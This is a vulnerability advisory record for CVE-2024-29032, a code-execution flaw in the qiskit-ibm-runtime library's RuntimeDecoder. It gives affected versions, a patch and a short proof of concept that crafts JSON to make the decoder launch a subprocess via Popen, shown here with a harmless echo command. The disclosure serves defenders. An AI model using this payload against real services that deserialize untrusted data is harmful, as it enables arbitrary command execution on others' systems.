{"id":"CVE-2024-29032","aliases":["GHSA-x4x5-jv3x-9c7m","PYSEC-2026-1858"],"title":"`qiskit_ibm_runtime.RuntimeDecoder` can execute arbitrary code","summary":"`qiskit_ibm_runtime.RuntimeDecoder` can execute arbitrary code","severity":"medium","cvss":5.3,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L","vendor":"qiskit-ibm-runtime","product":"qiskit-ibm-runtime","ecosystem":"pip","affected":["qiskit-ibm-runtime >= 0.1.0, < 0.21.2"],"patched":["qiskit-ibm-runtime 0.21.2"],"published":"2024-03-20","updated":"2026-09-10","sourceUpdated":"2026-09-10T03:49:24.724667698Z","source":"OSV","sourceUrl":"https://osv.dev/vulnerability/GHSA-x4x5-jv3x-9c7m","references":[{"url":"https://github.com/Qiskit/qiskit-ibm-runtime/security/advisories/GHSA-x4x5-jv3x-9c7m"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29032"},{"url":"https://github.com/Qiskit/qiskit-ibm-runtime/commit/b78fca114133051805d00043a404b25a33835f4d"},{"url":"https://github.com/Qiskit/qiskit-ibm-runtime"},{"url":"https://github.com/Qiskit/qiskit-ibm-runtime/blob/16e90f475e78a9d2ae77daa139ef750cfa84ca82/qiskit_ibm_runtime/utils/json.py#L156-L159"}],"tags":["osv","pip"],"epss":0.00372,"epssPercentile":0.31136,"ingestedAt":"2026-07-08T18:25:54.111Z","slug":"CVE-2024-29032","body":"## Overview\n\n### Summary\n\ndeserializing json data using `qiskit_ibm_runtime.RuntimeDecoder` can be made to execute arbitrary code given a correctly formatted input string\n\n### Details\n\n`RuntimeDecoder` is supposed to be able to deserialize JSON strings containing various special types encoded via `RuntimeEncoder`. However, one can structure a malicious payload to cause the decoder to spawn a subprocess and execute arbitrary code, exploiting this block of code: https://github.com/Qiskit/qiskit-ibm-runtime/blob/16e90f475e78a9d2ae77daa139ef750cfa84ca82/qiskit_ibm_runtime/utils/json.py#L156-L159\n\n### PoC\n\n```python\nmalicious_data = {\n    \"__type__\": \"settings\",\n    \"__module__\": \"subprocess\",\n    \"__class__\": \"Popen\",\n    \"__value__\": {\n        \"args\": [\"echo\", \"hi\"]\n    },\n}\njson_str = json.dumps(malicious_data)\n\n_ = json.loads(json_str, cls=qiskit_ibm_runtime.RuntimeDecoder)  # prints \"hi\" to the terminal\n```\n(where obviously \"echo hi\" can be replaced with something much more malicious)\n\nnotably the following also makes it through the runtime API, with `malicious_data` serialized client-side via `RuntimeEncoder` (and therefore presumably deserialized server-side via `RuntimeDecoder`?)\n```python\nservice = qiskit_ibm_runtime(<ibm_cloud_credentials>)\njob = service.run(\"qasm3-runner\", malicious_data)\nprint(job.status())  # prints \"JobStatus.QUEUED\"\n```\n\n### Impact\n\ni don't know if `qiskit_ibm_runtime.RuntimeDecoder` is used server-side so this may or may not be a serious vulnerability on your end (however it's definitely a security hole for anyone using the library to deserialize third-party data)\n\n## Affected packages\n\n- `qiskit-ibm-runtime >= 0.1.0, < 0.21.2`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `qiskit-ibm-runtime 0.21.2`","depth":"sunlit","depthScore":29,"depthScoreParts":{"impact":29.2,"likelihood":0.1,"exploitation":0,"ransomware":0},"changes":[]}